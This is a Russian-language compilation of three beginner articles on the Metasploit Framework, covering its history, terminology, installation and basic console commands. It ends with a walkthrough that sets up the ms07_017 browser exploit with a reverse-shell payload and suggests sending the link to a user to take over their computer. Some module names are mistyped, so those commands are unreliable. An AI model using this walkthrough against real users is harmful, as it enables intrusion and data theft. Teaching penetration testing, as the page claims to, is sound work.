Что такое metasploit
Что такое Metasploit Framework и как установить
Добро пожаловать новобранцы!
Моя цель показать вам некоторые из качественных инструментов, которые ИТ-специалисты по безопасности используют каждый день на своих рабочих местах, для проверки сетевой безопасности и профессионального тестирования. Есть сотни инструментов, но я остановлюсь на те, которые отвечают четырем основным критериям:
- Открытый исходный код
- бесплатные
- высокое качество
- Широко используются и проверенны в ИТ-безопасности / PEN-тестирования сообщества
Таким образом, в коробке инструментов хакера / пентестинга не обходится без добавления универсального и мощного Metasploit .
Что такое Metasploit Framework и как установить?
Metasploit является одним из наиболее широкоих и популярных используемых инструментов эксплуатации в области взлома / безопасности. Он используется как новичками, так и продвинутыми профессионалами. Основатель Nmap, ежегодно обследует специалистов по безопасности для их мнения на верхнем уровне обеспечения безопасности. Metasploit последовательно входит в число десяти с момента ее создания, и в настоящее время занимает второе или третье место. Это должно дать вам некоторое представление о том, как важен Metasploit и какова его ценность в сообщества безопасности.
Metasploit является само описанный “ Framework ” для кибер эксплуатации. В Framework, это облегчает использование известных уязвимостей в сетях, операционных систем и приложений, а также нужен для разработки новых эксплойтов для новых или неизвестных уязвимостей. Недавно проект Basecamp объявила о разработке Stuxnet, как модуль для Metasploit.
Metasploit разработал Meterpreter , что при загрузке в целевой системе, делает обеспечение доступа и управление целью гораздо легче. Таким образом, каждый уважающий себя хакер (и даже тех, кто лишен самоуважения), должны иметь базовые знания Metasploit. Эта серия статей будет сосредоточена о присвоении элементарного понимания того, как Metasploit работает и как он может быть использован тестером или хакером для загрузки данных и заметания следов.
Существует версия Windows Metasploit, но многие из способностей (RAW впрыска IP пакетов, эксплуатации беспроводных драйверов, SMB атаки и ретрансляции и т.д.) недоступны в среде Windows, хотя некоторые из этих ограничений возможно преодолеть с помощью Cygwin или работой Windows в виртуальной среде на Linux.
По этим и другим причинам, мы начнем эту серию, используя более гибкий интерфейс командной строки (CLI) версия в Linux, и в конце концов мы будем устанавливать и использовать Armitage GUI .
Как установить Metasploit?
Первый шаг в нашем процессе, это загрузить и установить Metasploit. Хотя есть версия, Windows, я остановлюсь на версии Linux из-за ее большей гибкости и возможностей. Давайте рассмотрим загрузку и установку на дистрибутиве, Ubuntu.
В Kali Linux он входит сразу в пакет. Там все уже загруженно и установленно.
Смотри тут как установить Kali Linux
Чтобы установить последнюю версию Metasploit 4 Framework на Ubuntu 11.08 (или каких-либо других дистрибутивов Debian-основанных), используйте следующие команды. Это загружает и устанавливает общие Linux бинарные файлы, которые поставляются в комплекте со всеми необходимыми компонентами, необходимыми для Metasploit для установки и запуска. Это должно работать для большинства пользователей и самый простой и быстрый способ получить Metasploit Framework это работать под Ubuntu и других дистрибутивов Linux Debian-основанных.
Сначала откройте окно терминала и введите:
Если вы устанавливаете на 64-битной сборки Ubuntu, используйте это:
Это загружает текущую версию Framework Metasploit через Wget.
Перед тем как запустить программу установки, вам нужно сделать его исполняемым. В терминале необходимо изменить режим для выполнения (х) для Metasploit:
А теперь выполнить программу установки, получая права суперпользователя, набрав Sudo и ./ с именем нашего пакета:
Затем вы должны ввести свой пароль суперпользователя. После ввода этого, вы должны получить экран, который выглядит примерно так:
Жмем Forward 3-4 раза.
Будьте терпеливы! Это займет Metasploit несколько минут, чтобы установить и построить свою базу данных. После того, как это сделано, вы готовы к запуску Metasploit.
Откройте терминал и просто введите:
Вы должны увидеть что-то наподобье этого:
Вы успешно установили лучший в мире Framework с открытым исходным кодом, и вы готовы, чтобы начать эксплуатацию сети и пентест. Наговорю уже, а самом главном по ходу дела сами узнаете на что способен этот Metasploit.
Пожалуйста, обратите внимание, что в моей установки здесь, он предупреждает меня, что обновление рекомендуется, поскольку последнее обновление было несколько дней назад. Если вы хотите обновить свою базу, откройте терминал а затем введите:
В моей следующей статье мы будем смотреть на терминологии и компоненты Metaspolit, а затем по
Добавить комментарий Отменить ответ
Для отправки комментария вам необходимо авторизоваться.
Что такое Metasploit? И что нужно знать о нем.
Давайте для начала начнем с того, что же такое этот Metasploit framework и разберемся немного с терминологией, чтоб было понятно что эти слова означают.
Metasploit framework– является полностью бесплатный framework созданный H. D. Moore в 2003 году, который в последствии был куплен Rapid7. Написан этот фреймфорк на языке Ruby. Metasploit обладает крупнейшими базами данных уязвимостей и принимает около миллиона загрузок каждый год. Он также является одним из самых сложных проектов на сегодняшний, написанных на языке Ruby. И сделан для того, чтоб быть в курсе о уязвимостях которые находятся в тех или иных программных обеспечения, чтоб сделать ваш продукт защищеннее чем он может быть.
Уязвимость (Vulnerability) — это слабое место, так сказать пята Ахилеса, которая позволяет злоумышленнику взламывать целевую систему. Уязвимость может существовать в операционных системах, программах, службах и т.д.
Эксплоит (Exploit) — это код с помощью которого злоумышленник может взломать систему, программу и т.п., у которой есть уязвимость. Каждое слабое место имеет свой собственный соответствующий эксплойт.
Payload — это код, который выполняется после эксплоита. В основном используется для настройки связи между жертвой и атакующим.
Давайте попробую показать на картинке для более подробного понимания этих слов.
И так, как мы видим стрелочку с названием Vulnerability, она показывает на уязвимость в холме (под холмом имеем введу ОС, DB и тд), куда может просочиться наш так называемый подготовленный набор скриптов Exploit, который спровоцирует взрыв в нашей системе (а именно доступ к ОС, изменение логики либо передачу данных пользователя удаленно). Ну а в конечном итоге выполним, после отработки злоскрипта, выполним следующий скрипт Payload, то-есть то, что мы хотим, чтоб в этой ОС, DB произошло по нашему. Надеюсь, я донес идею того как работает эта уязвимость.
А теперь перейдем к архитектурному виду нашего framework:
В Metasploit входят различные виды библиотек, которые играют большую роль в функционировании framework. Эти библиотеки представляют собой набор заранее определенных задач, операций и функций, которые могут быть использованы различными модулями системы. Самая фундаментальная часть framework написана на языке Ruby Extension (Rex). Некоторые компоненты Rex включают подсистему сокетов (wrapper socket subsystem), реализацию клиентских и серверных протоколов, регистрацию подсистемы (logging subsystem), exploitation utility classes, а также ряд других полезных классов.
Далее есть MSF Core библиотека, которая расширяет Rex. Core несет ответственность за выполнение всех необходимых интерфейсов (required interfaces), которые позволяют взаимодействовать с эксплоитами, модулями, сессиями и плагинами.
Metasploit состоит из четырех так называемых пользовательских интерфейсов:
Установка Metasploit доступна для всех Linux дистрибутивов , в Linux kaly он идет уже прям из коробки.
Скачайте Metasploit c офф сайта https://www.metasploit.com/download.
Перед тем как начать применять exploits и payloads на целевой машине, вы должны знать основы о них. Важно понять, как использовать эксплоиты, чтобы не допустить распространенные ошибки, которые могут возникнуть из-за неправильной конфигурации параметров.
Для того, чтобы начать использовать эксплоиты, нужно просканировать целевую машину допустим с помощью утилиты Nmap. О том как пользоваться ним можете прочесть другую мою статью, перейдя по ссылке. После того, как собрано достаточно информации о цели, след. шагом будет выбор подходящего эксплоита.
Давайте пробежимся по некоторым командам, которые применяются вместе с эксплоитами:
show payloads и show exploits — эти две команды показывают список доступных эксплоитов и payloads. например:
1 msf exploit(ms03_026_dcom) > show options
2 Module options (exploit/windows/dcerpc/ms03_026_dcom):
3 Name Current Setting Required Description
5 RHOST yes The target address
6 RPORT 135 yes The target port
search exploit — команда будет искать конкретный эксплоит, например
1 msf > search ms03_026_dcom
2 Matching Modules
4 Name Disclosure Date Rank Description
6 exploit/windows/dcerpc/ms03_026_dcom 2003–07–16 great Microsoft RPC DCOM
use exploit — команда устанавливает эксплоит в активное состояние, т.е. им можно пользоваться. например:
1 msf > use exploit/windows/dcerpc/ms03_026_dcom
2 msf exploit(ms03_026_dcom) >
set — эта команда задает значения для параметров/опций в эксплоите, см. след. команду. например:
1 msf exploit(ms03_026_dcom) > set RHOST 102.168.56.102
2 RHOST =>102.168.56.102
3 msf exploit(ms03_026_dcom) >
show targets — каждый exploit создан для атаки на конкретную службу/сервис. Эта команда показывает, какие цели могут быть атакованы, например:
1 msf exploit(ms03_026_dcom) > show targets
2 Exploit targets:
5 0 Windows NT SP3–6a/2000/XP/2003 Universal
А теперь можем потренироваться с такой уязвимостью как ms07_017. Которая позволяет снифферить все данные пользователя, который перешел по ссылке, которую дадим ему. Пример как это делать я показал в видео вверху статьи.
Для начала нам нужно найти ее полный путь поэтому выполним команду:
search ms07_017
Затем заюзать этот эксплоит командой:
use exploit/windows/brouser/ms07_017_ani_loadimage_chunksize
Смотрим информацию о данном эксплоите, что именно нам надо добавить для полноценного пользования. Пишем команду:
show option
Затем видим,что нам нужно задать payload, тоесть ОС на которую будет происходить атака. Для этого используем команду:
set Payload windows/shell/reverse_tsp
Видим также, что от нас требуется задать ip своего компа, по-этому пишем команду + свой айпи:
set LHOST 192.168.52.159
Можем теперь свой айпи кинуть какому-то пользователю и он перейдя на нее передаст нам полностью все свои данные, а так же откроет доступ к своему компьютеру, что дас там возможность даже создавать папки, читать файлы и тд.
И помните все показанное выше, сделано в целях обучения.
Можно применять только на своих проектах, после разрешения.
Metasploit, часть 1: знакомимся с мощным фреймворком для анализа безопасности
Содержание статьи
Metasploit — это мощный открытый фреймворк с продуманной архитектурой, сотнями контрибьюторов, который включает в себя тысячи модулей для автоматизации эксплуатации огромного количества уязвимостей. Несмотря на то что Metasploit регулярно появляется на страницах Хакера, многие только знакомятся с ним. Мы решили помочь начинающим пентестерам и запускаем новый цикл статей, который познакомит тебя с основными возможностями этого замечательного инструмента.
WARNING
Предыстория
История Metasploit берет начало в 2003 году. HD Moore, работавший пентестером в небольшой консалтинговой компании, заметил, что хранение и использование средств анализа безопасности организованы неудобно. На тот момент это был просто набор разрозненных эксплойтов и скриптов, общие сведения о которых хранились в базе данных. Информация о необходимом окружении для запуска скриптов, как правило, отсутствовала. Также они несли в себе кучу устаревшего кода, требовали модификации жестко прописанных путей для каждого конкретного случая, что весьма затрудняло рабочий процесс и усложняло разработку новых инструментов.
В Metasploit автор, пытаясь решить эту проблему, создал консольную утилиту на Perl с псевдографическим интерфейсом и включил в нее порядка одиннадцати эксплойтов. Сообщество встретило первую версию Metasploit весьма холодно, изрядно раскритиковав как архитектуру, так и саму идею. Тем не менее HD Moore не сдался и даже нашел сподвижника в лице spoonm, с которым они довели до ума модульную архитектуру фреймворка и выпустили вторую версию в 2004 году. Со временем фреймворк стал набирать популярность и обретать новых контрибьюторов.
Следующим значимым шагом был перевод Metasploit c Perl на Ruby, для того чтобы избежать ограничений Perl, обеспечить кросс-платформенность и добиться большей гибкости при разработке. В 2009 году фреймворк приобрела компания Rapid7, под эгидой которой продолжилось развитие open source версии, а также стали появляться коммерческие версии продукта. Сам фреймворк давно перерос статус простого набора для пентестера, и сегодня можно его можно встретить (хотя и нечасто) даже в арсенале «мирных» системных администраторов и программистов.
Версии
На момент написания статьи Metasploit распространяется в четырех версиях:
Продолжение доступно только участникам
Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», увеличит личную накопительную скидку и позволит накапливать профессиональный рейтинг Xakep Score! Подробнее
Источники:
https://codeby.net/blogs/metasploit-framework/
https://medium.com/@svyatoslavlogyn/%D1%87%D1%82%D0%BE-%D1%82%D0%B0%D0%BA%D0%BE%D0%B5-metasploit-%D0%B8-%D1%87%D1%82%D0%BE-%D0%BD%D1%83%D0%B6%D0%BD%D0%BE-%D0%B7%D0%BD%D0%B0%D1%82%D1%8C-%D0%BE-%D0%BD%D0%B5%D0%BC-5a1923b36b88
https://xakep.ru/2015/07/21/metasploit-part-1/
